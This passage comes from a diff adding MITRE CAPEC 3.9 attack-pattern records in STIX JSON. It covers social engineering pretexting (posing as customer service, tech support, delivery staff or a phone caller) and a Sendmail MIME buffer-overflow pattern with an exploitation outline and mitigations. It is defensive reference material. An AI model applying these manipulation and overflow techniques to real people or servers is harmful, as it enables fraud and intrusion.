information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.", + "external_references": [ + { + "external_id": "CAPEC-410", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/410.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Information Elicitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". 
Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.", + "external_references": [ + { + "external_id": "CAPEC-412", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/412.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Customer Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + 
"x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. 
However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.", + "external_references": [ + { + "external_id": "CAPEC-413", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/413.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Tech Support", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. 
Usually the hardest part is looking the part and having all of the proper credentials, papers and \"deliveries\" in order to be able to pull it off.", + "external_references": [ + { + "external_id": "CAPEC-414", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/414.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Delivery Person", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. This is the most common social engineering attack. 
Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.", + "external_references": [ + { + "external_id": "CAPEC-415", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/415.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Phone", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary's interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. 
Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary's speech and thought patterns.", + "external_references": [ + { + "external_id": "CAPEC-416", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/416.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Manipulate Human Behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + 
"attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--756dbec1-5182-44f6-a59e-093c4b3f451e", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "spec_version": "2.1", + "target_ref": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses social engineering to exploit the target's perception of the relationship between the adversary and themselves. 
This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-417", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/417.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + 
"attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "There are no necessary resources required for this attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.", + "id": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-417-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f1bc7a7-fc63-4847-b2bf-ad73c7d19b20", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or 
system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate pattern.", + "external_references": [ + { + "external_id": "CAPEC-419", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/419.html" + } + ], + "id": "attack-pattern--c5724646-0a5b-4b60-b0e2-6c445a744628", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Perception of Concession", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. 
Attack points exist when data are converted to MIME compatible format and back.", + "external_references": [ + { + "external_id": "CAPEC-42", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/42.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "CERT Advisory CA-1997-05 MIME Conversion Buffer Overflow in Sendmail Versions 8.8.3 and 8.8.4, Software Engineering Institute: Carnegie Mellon University", + "external_id": "REF-364", + "source_name": "reference_from_CAPEC", + "url": "http://www.cert.org/advisories/CA-1997-05.html" + } + ], + "id": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "MIME Conversion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run 
Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.\n Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.See also: CVE-1999-0047" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target mail server: The adversary identifies a target mail server that they wish to attack.

  2. Techniques
    Use Nmap on a system to identify a mail server service.
  3. Determine viability of attack: Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4).

Experiment

  1. Find injection vector: Identify places in the system where vulnerable MIME conversion routines may be used.

  2. Craft overflow content: The adversary crafts e-mail messages with special headers that will cause a buffer overflow for the vulnerable MIME conversion routine. The intent of this attack is to leverage the overflow for execution of arbitrary code and gain access to the mail server machine, so the adversary will craft an email that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target system uses a mail server.", + "Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system." + ], + "x_capec_skills_required": { + "High": "Causing arbitrary code to execute on the target system.", + "Low": "It may be trivial to cause a DoS via this attack pattern" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Stay up to date with third party vendor patches", + "id": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b0ebb42-718a-4b46-8ffb-8ce77603ff60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Disable the 7 to 8 bit conversion. 
This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "id": "course-of-action--42a390b0-9943-4e0f-91ff-7e67aecd06f1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f35d5325-e354-49ab-a92f-5ba6b8045162", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--42a390b0-9943-4e0f-91ff-7e67aecd06f1", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use the sendmail restricted shell program (smrsh)", + "id": 
"course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use mail.local", + "id": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--273ca915-2a10-4a89-8347-e45deeb8176d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target's decision-making process.", + "external_references": [ + { + "external_id": "CAPEC-420", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/420.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Scarcity", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, 
